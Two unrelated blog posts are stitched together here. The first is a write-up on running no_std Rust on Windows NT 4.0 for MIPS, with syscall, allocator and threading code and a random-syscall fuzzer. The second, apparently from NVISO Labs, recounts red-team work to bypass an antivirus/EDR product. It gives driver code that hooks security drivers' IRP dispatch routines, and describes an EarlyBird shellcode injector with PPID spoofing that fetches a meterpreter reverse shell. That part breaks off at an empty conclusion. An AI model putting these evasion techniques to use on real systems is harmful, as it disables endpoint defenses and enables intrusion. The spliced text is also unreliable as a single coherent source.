Unfortunately, Rust doesn’t have support for NT4.0 on MIPS, so we immediately don’t have the ability to use std. However, we can still use core and alloc with a small amount of work.

Rust has one of the best cross-compiling supports of any compiler, as you can simply have Rust build core for your target, even if you don’t have the pre-compiled package. core is simple enough that it’s a few second build process, so it doesn’t really complicate your build. Seriously, look how cool this is:

cargo new --bin rustexample

#![no_std]
#![no_main]

#[panic_handler]
fn panic_handler(_info: &core::panic::PanicInfo) -> ! {
    loop {}
}

#[no_mangle]
pub unsafe extern fn __start() -> ! {
    unimplemented!();
}

pleb@gamey ~/rustexample $ cargo build --target mipsel-unknown-none -Zbuild-std=core
   Compiling core v0.0.0 (/home/pleb/.rustup/toolchains/nightly-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/core)
   Compiling compiler_builtins v0.1.49
   Compiling rustc-std-workspace-core v1.99.0 (/home/pleb/.rustup/toolchains/nightly-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/rustc-std-workspace-core)
   Compiling rustexample v0.1.0 (/home/pleb/rustexample)
    Finished dev [unoptimized + debuginfo] target(s) in 8.84s

And there you go, you have a Rust binary for mipsel-unknown-none without having to download any pre-built toolchains, a libc, anything. You can immediately start building your program, using Rust-level constructs like slices and arrays with bounds checking, closures, whatever. No libc, no pre-built target-specific toolchains, nothing.

OS development in user-land

For educational reasons, and totally not because I just find it more fun, I decided that this project would not leverage the existing C libraries we have that do indeed exist in the MIPS guest. We could of course write PE importers to leverage the existing kernel32.dll and user32.dll present in all Windows processes by default, but no, that’s not fun. We can justify this by saying that the goal of this project is to fuzz the NT kernel, and thus we need to understand what syscalls look like.

So, with that in mind, we’re basically on our own. We’re effectively writing an OS in user-land, as we have absolutely no libraries or features by default. We have to write our inline assembly and work with raw pointers to bootstrap our execution environment for Rust.

The very first thing we need is a way of outputting debug information. I don’t care how we do this. It could be a file, a socket, the stdout, who cares. To do this, we’ll need to ask the kernel to do something via a syscall.

Syscall Layer

To invoke syscalls, we need to conform to a somewhat “custom” calling convention. System calls effectively are always indexed by some integer, selecting the API that you want to invoke. In the case of MIPS this is put into the $v0 register, which is not normally used as a calling convention. Thus, to perform a syscall with this modified convention, we have to use some assembly. Luckily, the rest of the calling convention for syscalls is unmodified from the standard MIPS o32 ABI, and we can pass through everything else.

To pass everything as is to the syscall we actually have to make sure Rust is using the same ABI as the kernel, we do this by declaring our function as extern, which switches us to the default MIPS o32 C ABI. Technically I think Windows does floating point register passing different than o32, but we’ll cross that bridge when we get there.

We need to be confident that the compiler is not emitting some weird prologue or moving around registers in our syscall function, and luckily Rust comes to the rescue again with a #[naked] function decorator. This marks the function as never inline-able, but also guarantees that no prolog or epilog are present in the function. This is common in a lot of low level languages, but Rust goes a step further and requires that naked functions only contain a single assembly statement that must not return (you must manually handle the return), and that your assembly is the first code that executes. Ultimately, it’s really just a global label on inline assembly with type information. Sweet.

So, we simply have to write a syscall helper for each number of arguments we want to support like such:

/// 2-argument syscall
#[allow(unused)]
#[naked]
pub unsafe extern fn syscall2(_: usize, _: usize, id: usize) -> usize {
    asm!(r#"
        move $v0, $a2
        syscall
    "#, options(noreturn));
}

We mark the function as naked, pass in the syscall ID as the last parameter (as to not disturb the ordering of the earlier parameters which we pass through to the syscall), move the syscall ID to $v0, and invoke the syscall. Weirdly, for MIPS, the syscall does not return to the instruction after the syscall, it actually returns to $ra, the return address, so it’s critical that the function is never inlined as this wrapper relies on returning back to the call site of the caller of syscall2(). Luckily, naked ensures this for us, and thus this wrapper is sufficient for syscalls!

Getting output

Back to the console, we initially started with trying to do stdout, but according to Twitch chat it sounds like old Windows this was actually done via some RPC with conhost. So, we abandoned that. We wrote a tiny example of using a NtOpenFile() and NtWriteFile() syscall to drop a file to disk with a log, and this was a cool example of early syscalls, but still not convenient.

Remember, I’m picky about the development cycle.

So, we decided to go with a socket for our final build. Unfortunately, creating a socket in Windows via syscalls is actually pretty hard (I think it’s done mainly over IOCTLs), but we cheated here and just passed the handle from the FELF loader that already had to connect to our host. We can simply change our FELF server to serve the FELF to the VM and then recv() forever, printing out the console output. Now we have a remote console output.

Windows Syscalls

Windows syscalls are a lot heavier than what you might be used to on UNIX, they are also sometimes undocumented. Luckily, the NtWriteFile() syscall that we really need is actually not too bad. It takes a file handle, some optional stuff we don’t care about, an IO_STATUS_BLOCK (which returns number of bytes written), a buffer, a length, and an offset in the file to write to.

/// Write to a file
pub fn write(fd: &Handle, bytes: impl AsRef<[u8]>) -> Result<usize> {
    let mut offset = 0u64;
    let mut iosb = IoStatusBlock::default();

    // Perform syscall
    let status = NtStatus(unsafe {
        syscall9(
            // [in] HANDLE FileHandle
            fd.0,

            // [in, optional] HANDLE Event
            0,

            // [in, optional] PIO_APC_ROUTINE ApcRoutine,
            0,

            // [in, optional] PVOID ApcContext,
            0,

            // [out] PIO_STATUS_BLOCK IoStatusBlock,
            addr_of_mut!(iosb) as usize,

            // [in] PVOID Buffer,
            bytes.as_ref().as_ptr() as usize,

            // [in] ULONG Length,
            bytes.as_ref().len(),

            // [in, optional] PLARGE_INTEGER ByteOffset,
            addr_of_mut!(offset) as usize,

            // [in, optional] PULONG Key
            0,

            // Syscall number
            Syscall::WriteFile as usize)
    } as u32);

    // If success, return number of bytes written, otherwise return error
    if status.success() {
        Ok(iosb.information)
    } else {
        Err(status)
    }
}

Rust `print!()` and formatting

To use Rust in the best way possible, we want to have support for the print!() macro, this is the printf() of the Rust world. It happens to be really easy to add support for!

/// Writer structure that simply implements [`core::fmt::Write`] such that we
/// can use `write_fmt` in our [`print!`]
pub struct Writer;

impl core::fmt::Write for Writer {
    fn write_str(&mut self, s: &str) -> core::fmt::Result {
        let _ = crate::syscall::write(unsafe { &SOCKET }, s);

        Ok(())
    }
}

/// Classic `print!()` macro
#[macro_export]
macro_rules! print {
    ($($arg:tt)*) => {
        let _ = core::fmt::Write::write_fmt(
            &mut $crate::print::Writer, core::format_args!($($arg)*));
    }
}

Simply create a dummy structure, implement core::fmt::Write on it, and now you can directly use Write::write_fmt() to write format strings. All you have to do is implement a sink for &strs, which is really just a char* and a length. In our case, we invoke the NtWriteFile() syscall with our socket we saved from the client.

Viola, we have remote output in a nice development environment:

pleb@gamey ~/mipstest $ felfserv 0.0.0.0:1234 ./out.felf


Serving 6732 bytes to 192.168.1.2:45914
---------------------------------
Hello world from Rust at 0x13370790

fn main() -> Result<(), ()> {
    println!("Hello world from Rust at {:#x}", main as usize);
    Ok(())
}

It’s that easy!

Memory allocation

Now that we have the basic ability to print things and use Rust, the next big feature that we’re missing is the ability to dynamically allocate memory. Luckily, we talked about the alloc feature of Rust before. Now, alloc isn’t something you get for free. Rust doesn’t know how to allocate memory in the environment you’re running it in, so you need to implement an allocator.

Luckily, once again, Rust is really friendly here. All you have to do is implement the GlobalAlloc trait on a global structure. You implement an alloc() function which takes in a Layout (size and alignment) and returns a *mut u8, NULL on failure. Then you have a dealloc() where you get the pointer that was used for the allocation, the Layout again (actually really nice to know the size of the allocation at free() time) and that’s it.

Since we don’t care too much about the performance of our dynamic allocator, we’ll just pass this information through directly to the NT kernel by doing virtual memory maps and frees.

use alloc::alloc::{Layout, GlobalAlloc};

/// Implementation of the global allocator
struct GlobalAllocator;

/// Global allocator object
#[global_allocator]
static GLOBAL_ALLOCATOR: GlobalAllocator = GlobalAllocator;

unsafe impl GlobalAlloc for GlobalAllocator {
    unsafe fn alloc(&self, layout: Layout) -> *mut u8 {
        crate::syscall::mmap(0, layout.size()).unwrap_or(core::ptr::null_mut())
    }
    
    unsafe fn dealloc(&self, addr: *mut u8, _layout: Layout) {
        crate::syscall::munmap(addr as usize)
            .expect("Failed to deallocate memory");
    }
}

As for the syscalls, they’re honestly not too bad for this either that I won’t go into more detail. You’ll notice these are similar to VirtualAlloc() that is a common API in Windows development.

/// Allocate virtual memory in the current process
pub fn mmap(mut addr: usize, mut size: usize) -> Result<*mut u8> {
    /// Commit memory
    const MEM_COMMIT: u32 = 0x1000;

    /// Reserve memory range
    const MEM_RESERVE: u32 = 0x2000;

    /// Readable and writable memory
    const PAGE_READWRITE: u32 = 0x4;

    // Perform syscall
    let status = NtStatus(unsafe {
        syscall6(
            // [in] HANDLE ProcessHandle,
            !0,

            // [in, out] PVOID *BaseAddress,
            addr_of_mut!(addr) as usize,

            // [in] ULONG_PTR ZeroBits,
            0,

            // [in, out] PSIZE_T RegionSize,
            addr_of_mut!(size) as usize,

            // [in] ULONG AllocationType,
            (MEM_COMMIT | MEM_RESERVE) as usize,

            // [in] ULONG Protect
            PAGE_READWRITE as usize,

            // Syscall ID
            Syscall::AllocateVirtualMemory as usize,
        )
    } as u32);

    // If success, return allocation otherwise return status
    if status.success() {
        Ok(addr as *mut u8)
    } else {
        Err(status)
    }
}
    
/// Release memory range
const MEM_RELEASE: u32 = 0x8000;

/// De-allocate virtual memory in the current process
pub unsafe fn munmap(mut addr: usize) -> Result<()> {
    // Region size
    let mut size = 0usize;

    // Perform syscall
    let status = NtStatus(syscall4(
        // [in] HANDLE ProcessHandle,
        !0,

        // [in, out] PVOID *BaseAddress,
        addr_of_mut!(addr) as usize,

        // [in, out] PSIZE_T RegionSize,
        addr_of_mut!(size) as usize,

        // [in] ULONG AllocationType,
        MEM_RELEASE as usize,

        // Syscall ID
        Syscall::FreeVirtualMemory as usize,
    ) as u32);

    // Return error on error
    if status.success() {
        Ok(())
    } else {
        Err(status)
    }
}

And viola. Now we can use Strings, Boxs, Vecs, BTreeMaps, and a whole list of other standard data structures in Rust. At this point, other than file I/O, networking, and threading, this environment is probably capable of running pretty much any generic Rust code, just by implementing two simple allocation functions. How cool is that!?

Threading

Some terrible person in my chat just had to ask “what about threading support”. Of course, this could be an off handed comment that I dismiss or laugh at, but yeah, what about threading? After all, we want to write a fuzzer, and without threads it’ll be hard to hit those juicy, totally necessary on 1996 software, race conditions?!

Well, this threw us down a huge loop. First of all, how do we actually create threads in Windows, and next, how do we do it in a Rust-style way of using closures that can be join()ed to get the return result.

Creating threads on Windows

Unfortunately, creating threads on Windows requires the NtCreateThread() syscall. This is not documented, and honestly took a pretty long time to figure out. You don’t actually give it a function pointer to execute and a parameter like most thread creation libraries at a higher level.

Instead, you actually give it an entire CONTEXT. In Windows development, the CONTEXT structure is a very-specific-to-your-architecture structure that contains all of the CPU register state. So, you actually have to figure out the correct CONTEXT shape for your architecture (usually there are multiple, controlled by heavy #ifdefs). This might have taken us an hour to actually figure out, I don’t remember.

On top of this, you also provide it the stack register. Yep, you heard that right, you have to create the stack for the thread. This is yet another step that I wasn’t really expecting that added to the complexity.

Anyways, at the end of the day, you launch a new thread in your process, you give it a CPU context (and by nature a stack and target entry address), and let it run off and do its thing.

However, this isn’t very Rust-like. Rust allows you to optionally join() on a thread to get the return result from it, further, threads are started as closures so you can pass in arbitrary parameters to the thread with super convenient syntax either by move or by reference.

Threading in Rust

This leads to a hard-ish problem. How do we get Rust-style threads? Until we wrote this, I never really even thought about it. Initially we thought about some fancy static ways of doing it, but ultimately, due to using closures, you must put information on the heap. It’s obvious in hindsight, but if you want to move ownership of some of your stack locals into this thread, how are you possibly going to do that without storing it somewhere. You can’t let the thread use the parents stack, that wouldn’t work to well.

So, we implemented a spawn routine that would take in a closure (with the same constraints of Rust’s own std::thread::spawn), put the closure into a Box, turning it into a dynamically dispatched trait (vftables and friends), while moving all of the variables captured by the closure into the heap.

We then can invoke NtCreateThread() with a stack that we created, point the thread at a simple trampoline and pass in a pointer to the raw backing of the Box. Then, in the trampoline, we can convert the raw pointer back into a Box and invoke it! Now we’ve run the closure in the thread!

Return values

Unfortunately, this only gets us execution of the closure. We still have to add the ability to get return values from the thread. This has a unique design problem that the return value has to be accessible to the thread which created it, while also being accessible to the thread itself to initialize. Since the creator of the thread can also just ignore the result of the thread, we can’t free the return storage if the creator doesn’t want it as the thread won’t know that information (or you’d have to communicate it).

So, we ended up using an Arc<>. This is an atomic reference counted heap allocated structure in Rust, and it ensures that the value lives as long as there is one reference. This works perfectly for this situation, we give one copy of the Arc to the thread (ref count 1), and then another copy to the creator of the thread (ref count 2). This way, the only way the storage for the Arc is freed is if both the thread and creator are done with it.

Further, we need to ensure some level of synchronization with the thread as the creator cannot check this return value of the thread until the thread has initialized it. Luckily, we can accomplish this in two ways. One, when a user join()s on a thread, it blocks until that thread finishes execution. To do this we invoke NtWaitForSingleObject() that takes in a HANDLE, given to us when we created the thread, and a timeout. By setting an infinite timeout we can ensure that we do not do anything until the thread is done.

This leaves some implementation specific details about threads up in the air, like what happens with thread early termination, crashes, etc. Thus, we want to also ensure the return value has been updated in another way.

We did this by being creative with the Arc reference count. The Arc reference count can only be decreased by the thread when the Arc goes out of scope, and due to the way we designed the thread, this can only happen once the value has been successfully initialized.

Thus, in our main thread, we can call Arc::try_unwrap() on our return value, this will only succeed if we are the only reference to the Arc, thus atomically ensuring that the thread has successfully updated the return value!

Now we have full Rust-style threading, ala:

fn main() -> Result<(), ()> {
    let a_local_value = 5;

    let thr = syscall::spawn(move || {
        println!("Hello world from Rust thread {}", a_local_value);
        core::cell::RefCell::new(22)
    }).unwrap();

    println!("Return val: {:?}", thr.join().unwrap());

    Ok(())
}

Serving 23500 bytes to 192.168.1.2:46026
---------------------------------
Hello world from Rust thread 5
Return val: RefCell { value: 22 }

HOW COOL IS THAT!? RIGHT!? This is on MIPS for Windows NT 4.0, an operating system from almost 20 years prior to Rust even existing! We have all the safety and fun features of bounds checking, dynamically growing vectors, scope-based dropping of references, locks, and allocations, etc.

Cleaning it all up

Unfortunately, we have a few leaks. We leak the handle that we got from when we created the thread, and we also leak the stack of the thread itself. This is actually a tough-ish problem. How do we free the stack of a thread when we don’t know when it exits (as the creator of the thread might never join() it).

Well, the first problem is easy. Implement a Handle type, implement a Drop handler on it, and Rust will automatically clean up the handle when it goes out of scope by calling the NtClose() in our Drop handler. Phew, that’s easy.

Freeing the stack is a bit harder, but we decided that the best route would be to have the thread free its own stack. This isn’t too hard, it just means that we must free the stack and exit the thread without touching the stack, ideally without using any globals as that would have race conditions.

Luckily, we can do this just fine if we implement the syscalls we need directly in one assembly block where we know we have full control.

// Region size
let mut rsize = 0usize;

// Free the stack and then exit the thread. We do this in one assembly
// block to ensure we don't touch any stack memory during this stage
// as we are freeing the stack.
unsafe {
    asm!(r#"
        // Set the link register
        jal 2f

        // Exit thread
        jal 3f
        break

    2:
        // NtFreeVirtualMemory()
        li $v0, {free}
        syscall

    3:
        // NtTerminateThread()
        li $v0, {terminate}
        li $a0, -2 // GetCurrentThread()
        li $a1, 0  // exit code
        syscall

    "#, terminate = const Syscall::TerminateThread   as usize,
        free      = const Syscall::FreeVirtualMemory as usize,
        in("$4") !0usize,
        in("$5") addr_of_mut!(stack),
        in("$6") addr_of_mut!(rsize),
        in("$7") MEM_RELEASE, options(noreturn));
}

Interestingly we do technically have to pass a stack variable to NtFreeVirtualMemory() but that’s actually okay as either the kernel updates that variable before freeing the stack, and thus it’s fine, or it updates the variable as an untrusted user pointer after freeing the stack, and returns with an error. We don’t really care either way as the stack is freed. Then, all we have to do is call NtTerminateThread() and we’re all done.

Huzzah, fancy Rust threading, no memory leaks, (hopefully) no race conditions.

/// Spawn a thread
///
/// MIPS specific due to some inline assembly as well as MIPS-specific context
/// structure creation.
pub fn spawn<F, T>(f: F) -> Result<JoinHandle<T>>
        where F: FnOnce() -> T,
              F: Send + 'static,
              T: Send + 'static {
    // Holder for returned client handle
    let mut handle = 0usize;

    // Placeholder for returned client ID
    let mut client_id = [0usize; 2];

    // Create a new context
    let mut context: Context = unsafe { core::mem::zeroed() };

    // Allocate and leak a stack for the thread
    let stack = vec![0u8; 4096].leak();

    // Initial TEB, maybe some stack stuff in here!?
    let initial_teb = [0u32; 5];

    /// External thread entry point
    extern fn entry<F, T>(func:      *mut F,
                          ret:       *mut UnsafeCell<MaybeUninit<T>>,
                          mut stack:  usize) -> !
            where F: FnOnce() -> T,
                  F: Send + 'static,
                  T: Send + 'static {
        // Create a scope so that we drop `Box` and `Arc`
        {
            // Re-box the FFI'd type
            let func: Box<F> = unsafe {
                Box::from_raw(func)
            };

            // Re-box the return type
            let ret: Arc<UnsafeCell<MaybeUninit<T>>> = unsafe {
                Arc::from_raw(ret)
            };

            // Call the closure and save the return
            unsafe { (&mut *ret.get()).write(func()); }
        }

        // Region size
        let mut rsize = 0usize;

        // Free the stack and then exit the thread. We do this in one assembly
        // block to ensure we don't touch any stack memory during this stage
        // as we are freeing the stack.
        unsafe {
            asm!(r#"
                // Set the link register
                jal 2f

                // Exit thread
                jal 3f
                break

            2:
                // NtFreeVirtualMemory()
                li $v0, {free}
                syscall

            3:
                // NtTerminateThread()
                li $v0, {terminate}
                li $a0, -2 // GetCurrentThread()
                li $a1, 0  // exit code
                syscall

            "#, terminate = const Syscall::TerminateThread   as usize,
                free      = const Syscall::FreeVirtualMemory as usize,
                in("$4") !0usize,
                in("$5") addr_of_mut!(stack),
                in("$6") addr_of_mut!(rsize),
                in("$7") MEM_RELEASE, options(noreturn));
        }
    }

    let rbox = unsafe {
        /// Control context
        const CONTEXT_CONTROL: u32 = 1;

        /// Floating point context
        const CONTEXT_FLOATING_POINT: u32 = 2;

        /// Integer context
        const CONTEXT_INTEGER: u32 = 4;

        // Set the flags for the registers we want to control
        context.context.bits64.flags =
            CONTEXT_CONTROL | CONTEXT_FLOATING_POINT | CONTEXT_INTEGER;

        // Thread entry point
        context.context.bits64.fir = entry::<F, T> as usize as u32;

        // Set `$a0` argument
        let cbox: *mut F = Box::into_raw(Box::new(f));
        context.context.bits64.int[4] = cbox as u64;
        
        // Create return storage in `$a1`
        let rbox: Arc<UnsafeCell<MaybeUninit<T>>> =
            Arc::new(UnsafeCell::new(MaybeUninit::uninit()));
        context.context.bits64.int[5] = Arc::into_raw(rbox.clone()) as u64;

        // Pass in stack in `$a2`
        context.context.bits64.int[6] = stack.as_mut_ptr() as u64;

        // Set the 64-bit `$sp` to the end of the stack
        context.context.bits64.int[29] =
            stack.as_mut_ptr() as u64 + stack.len() as u64;
        
        rbox
    };

    // Create the thread
    let status = NtStatus(unsafe {
        syscall8(
            // OUT PHANDLE ThreadHandle
            addr_of_mut!(handle) as usize,

            // IN ACCESS_MASK DesiredAccess
            0x1f03ff,

            // IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL
            0,

            // IN HANDLE ProcessHandle
            !0,

            // OUT PCLIENT_ID ClientId
            addr_of_mut!(client_id) as usize,

            // IN PCONTEXT ThreadContext,
            addr_of!(context) as usize,

            // IN PINITIAL_TEB InitialTeb
            addr_of!(initial_teb) as usize,

            // IN BOOLEAN CreateSuspended
            0,

            // Syscall number
            Syscall::CreateThread as usize
        )
    } as u32);

    // Convert error to Rust error
    if status.success() {
        Ok(JoinHandle(Handle(handle), rbox))
    } else {
        Err(status)
    }
}

Fun oddities

While doing this work it was fun to notice that it seems that threads do not die upon crashing. It would appear that the thread initialization thunk that Windows normally shims in when you create a thread must register some sort of exception handler which then fires and the thread itself reports the information to the kernel. At least in this version of NT, the thread did not die, and the process didn’t crash as a whole.

“Fuzzing” Windows NT

Windows NT 4.0 blue screen of death

Of course, the point of this project was to fuzz Windows NT. Well, it turns out that literally the very first thing we did… randomly invoke a syscall, was all it took.

/// Worker thread for fuzzing
fn worker(id: usize) {
    // Create an RNG
    let rng = Rng::new(0xe06fc2cdf7b80594 + id as u64);

    loop {
        unsafe {
            syscall::syscall0(rng.next() as usize);
        }
    }
}

Yep, that’s all it took.

Debugging Windows NT Blue Screens

Unfortunately, we’re in a pretty legacy system and our tools for debugging are limited. Especially for MIPS executables for Windows. Turns out that Ghidra isn’t able to load MIPS PEs at all, and Binary Ninja has no support for the debug information.

We started by writing a tool that would scrape the symbol output and information from mipskd (which works really similar to modern KD), but unfortunately one of the members of my chat claimed a chat reward to have me drop whatever I was doing and rewrite it in Rust.

At the moment we were writing a hacky batch script to dump symbols in a way we could save to disk, rip out of the VM, and then use in Binary Ninja. However, well, now I had to do this all in Rust.

Parsing DBG COFF

The debug files that ship with Windows NT on the ISO are DI magic-ed files. These are separated debug information with a slightly specialized debug header with COFF symbol information. This format is actually relatively well documented, so writing the parser wasn’t too much effort. Most of the development time was trying to figure out how to correlate source line information to addresses. Ultimately, the only possible method to do this that I found was to use the statefulness of the sequence of debug symbol entries to associate the current file definition (in sequence with debug symbols) with symbols that are described after it.

I don’t know if this is the correct design, as I didn’t find it documented everywhere. It is standardized in a few documents, but these DBG files did not follow that format.

I ultimately wrote coff_nm for this parsing, which simply writes to stdout with the format:

F <addr> <function>
G <addr> <global>
S <addr> <source>:<line>

Binary Ninja

Binary Ninja with Pinball.exe open and symbolized

(Fun fact, yes, you can find PPC, MIPS, and Alpha versions of the Space Cadet Pinball game you know and love)

I wrote a very simple Binary Ninja script that allowed me to import this debug information into the program:

from binaryninja import *
import re, subprocess

def load_dbg_file(bv, function):
    rex = re.compile("^([FGS]) ([0-9a-f]{8}) (.*)$")

    # Prompt for debug file input
    dbg_file = interaction \
        .get_open_filename_input("Debug file",
        "COFF Debug Files (*.dbg *.db_)")

    if dbg_file:
        # Parse the debug file
        output = subprocess.check_output(["dbgparse", dbg_file]).decode()
        for line in output.splitlines():
            (typ, addr, name) = rex.match(line).groups()
            addr = bv.start + int(addr, 16)

            (mangle_typ, mangle_name) = demangle.demangle_ms(bv.arch, name)
            if type(mangle_name) == list:
                mangle_name = "::".join(mangle_name)

            if typ == "F":
                # Function
                bv.create_user_function(addr)
                bv.define_user_symbol(Symbol(SymbolType.FunctionSymbol, addr, mangle_name, raw_name=name))
                if mangle_typ != None:
                    bv.get_function_at(addr).function_type = mangle_typ
            elif typ == "G":
                # Global
                bv.define_user_symbol(Symbol(SymbolType.DataSymbol, addr, mangle_name, raw_name=name))
            elif typ == "S":
                # Sourceline
                bv.set_comment_at(addr, name)

        # Update analysis
        bv.update_analysis()

PluginCommand.register_for_address("Load COFF DBG file", "Load COFF .DBG file from disk", load_dbg_file)

This simply prompts the user for a file, invokes the dbgparse tool, parses the output, and then uses Binary Ninjas demangling to demangle names and extract type information (for mangled names). This script tells Binja what functions we know exist, the names of them, and the typing of them (from mangling information), it also applies symbols for globals, and finally it applies source line information as comments.

Thus, we now have a great environment for reading and reviewing NT code for analyzing the crashes we find with our “fuzzer”!

Conclusion

Well, this has gotten a lot longer than expected, and it’s also 5am so I’m just going to upload this as is, so hopefully it’s not a mess as I’m not reading through it to check for errors. Anyways, I hope you enjoyed this write up the 3 streams so far on this content. It’s been a really fun project, and I hope that you tune into my live streams and watch the next steps unfold!

~Gamozo

Kernel Karnage – Part 3 (Challenge Accepted)

NVISO Labs

bautersj

16 November 2021 at 08:28

While I was cruising along, taking in the views of the kernel landscape, I received a challenge …

1. Player 2 has entered the game

The past weeks I mostly experimented with existing tooling and got acquainted with the basics of kernel driver development. I managed to get a quick win versus $vendor1 but that didn’t impress our blue team, so I received a challenge to bypass $vendor2. I have to admit, after trying all week to get around the protections, $vendor2 is definitely a bigger beast to tame.

I foolishly tried to rely on blocking the kernel callbacks using the Evil driver from my first post and quickly concluded that wasn’t going to cut it. To win this fight, I needed bigger guns.

2. Know your enemy

$vendor2’s defenses consist of a number of driver modules:

eamonm.sys (monitoring agent?)
edevmon.sys (device monitor?)
eelam.sys (early launch anti-malware driver)
ehdrv.sys (helper driver?)
ekbdflt.sys (keyboard filter?)
epfw.sys (personal firewall driver?)
epfwlwf.sys (personal firewall light-weight filter?)
epfwwfp.sys (personal firewall filter?)

and a user mode service: ekrn.exe ($vendor2 kernel service) running as a System Protected Process (enabled by eelam.sys driver).

At this stage I am only guessing the roles and functionality of the different driver modules based on their names and some behaviour I have observed during various tests, mainly because I haven’t done any reverse-engineering yet. Since I am interested in running malicious binaries on the protected system, my initial attack vector is to disable the functionality of the ehdrv.sys, epfw.sys and epfwwfp.sys drivers. As far as I can tell using WinObj and listing all loaded modules in WinDbg (lm command), epfwlwf.sys does not appear to be running and neither does eelam.sys, which I presume is only used in the initial stages when the system is booting up to start ekrn.exe as a System Protected Process.

In the context of my internship being focused on the kernel, I have not (yet) considered attacking the protected ekrn.exe service. According to the Microsoft Documentation, a protected process is shielded from code injection and other attacks from admin processes. However, a quick Google search tells me otherwise

3. Interceptor

With my eye on the ehdrv.sys, epfw.sys and epfwwfp.sys drivers, I noticed they all have registered callbacks, either for process creation, thread creation, or both. I’m still working on expanding my own driver to include callback functionality, which will also look at image load callbacks, which are used to detect the loading of drivers and so on. Luckily, the Evil driver has got this angle (partially) covered for now.

Unfortunately, we cannot solely rely on blocking kernel callbacks. Other sources contacting the $vendor2 drivers and reporting suspicious activity should also be taken into consideration. In my previous post I briefly touched on IRP MajorFunction hooking, which is a good -although easy to detect- way of intercepting communications between drivers and other applications.

I wrote my own driver called Interceptor, which combines the ideas of @zodiacon’s Driver Monitor project and @fdiskyou’s Evil driver.

To gather information about all the loaded drivers on the system, I used the AuxKlibQueryModuleInformation() function. Note that because I return output via pass-by-reference parameters, the calling function is responsible for cleaning up any allocated memory and preventing a leak.

NTSTATUS ListDrivers(PAUX_MODULE_EXTENDED_INFO& outModules, ULONG& outNumberOfModules) {
    NTSTATUS status;
    ULONG modulesSize = 0;
    PAUX_MODULE_EXTENDED_INFO modules;
    ULONG numberOfModules;

    status = AuxKlibInitialize();
    if(!NT_SUCCESS(status))
        return status;

    status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), nullptr);
    if (!NT_SUCCESS(status) || modulesSize == 0)
        return status;

    numberOfModules = modulesSize / sizeof(AUX_MODULE_EXTENDED_INFO);

    modules = (AUX_MODULE_EXTENDED_INFO*)ExAllocatePoolWithTag(PagedPool, modulesSize, DRIVER_TAG);
    if (modules == nullptr)
        return STATUS_INSUFFICIENT_RESOURCES;

    RtlZeroMemory(modules, modulesSize);

    status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), modules);
    if (!NT_SUCCESS(status)) {
        ExFreePoolWithTag(modules, DRIVER_TAG);
        return status;
    }

    //calling function is responsible for cleanup
    //if (modules != NULL) {
    //	ExFreePoolWithTag(modules, DRIVER_TAG);
    //}

    outModules = modules;
    outNumberOfModules = numberOfModules;

    return status;
}

Using this function, I can obtain information like the driver’s full path, its file name on disk and its image base address. This information is then passed on to the user mode application (InterceptorCLI.exe) or used to locate the driver’s DriverObject and MajorFunction array so it can be hooked.

To hook the driver’s dispatch routines, I still rely on the ObReferenceObjectByName() function, which accepts a UNICODE_STRING parameter containing the driver’s name in the format \\Driver\\DriverName. In this case, the driver’s name is derived from the driver’s file name on disk: mydriver.sys –> \\Driver\\mydriver.

However, it should be noted that this is not a reliable way to obtain a handle to the DriverObject, since the driver’s name can be set to anything in the driver’s DriverEntry() function when it creates the DeviceObject and symbolic link.

Once a handle is obtained, the target driver will be stored in a global array and its dispatch routines hooked and replaced with my InterceptGenericDispatch() function. The target driver’s DriverObject->DriverUnload dispatch routine is separately hooked and replaced by my GenericDriverUnload() function, to prevent the target driver from unloading itself without us knowing about it and causing a nightmare with dangling pointers.

NTSTATUS InterceptGenericDispatch(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
	UNREFERENCED_PARAMETER(DeviceObject);
    auto stack = IoGetCurrentIrpStackLocation(Irp);
	auto status = STATUS_UNSUCCESSFUL;
	KdPrint((DRIVER_PREFIX "GenericDispatch: call intercepted\n"));

    //inspect IRP
    if(isTargetIrp(Irp)) {
        //modify IRP
        status = ModifyIrp(Irp);
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    else if (isDiscardIrp(Irp)) {
        //call own completion routine
        status = STATUS_INVALID_DEVICE_REQUEST;
	    return CompleteRequest(Irp, status, 0);
    }
    else {
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    return CompleteRequest(Irp, status, 0);
}

void GenericDriverUnload(PDRIVER_OBJECT DriverObject) {
	for (int i = 0; i < MaxIntercept; i++) {
		if (globals.Drivers[i].DriverObject == DriverObject) {
			if (globals.Drivers[i].DriverUnload) {
				globals.Drivers[i].DriverUnload(DriverObject);
			}
			UnhookDriver(i);
		}
	}
	NT_ASSERT(false);
}

4. Early bird gets the worm

Armed with my new Interceptor driver, I set out to try and defeat $vendor2 once more. Alas, no luck, mimikatz.exe was still detected and blocked. This got me thinking, running such a well-known malicious binary without any attempts to hide it or obfuscate it is probably not realistic in the first place. A signature check alone would flag the binary as malicious. So, I decided to write my own payload injector for testing purposes.

Based on research presented in An Empirical Assessment of Endpoint Detection and Response Systems against Advanced Persistent Threats Attack Vectors by George Karantzas and Constantinos Patsakis, I chose for a shellcode injector using:
– the EarlyBird code injection technique
– PPID spoofing
– Microsoft’s Code Integrity Guard (CIG) enabled to prevent non-Microsoft DLLs from being injected into our process
– Direct system calls to bypass any user mode hooks.

The injector delivers shellcode to fetch a “windows/x64/meterpreter/reverse_tcp” payload from the Metasploit framework.

Using my shellcode injector, combined with the Evil driver to disable kernel callbacks and my Interceptor driver to intercept any IRPs to the ehdrv.sys, epfw.sys and epfwwfp.sys drivers, the meterpreter payload is still detected but not blocked by $vendor2.

5. Conclusion

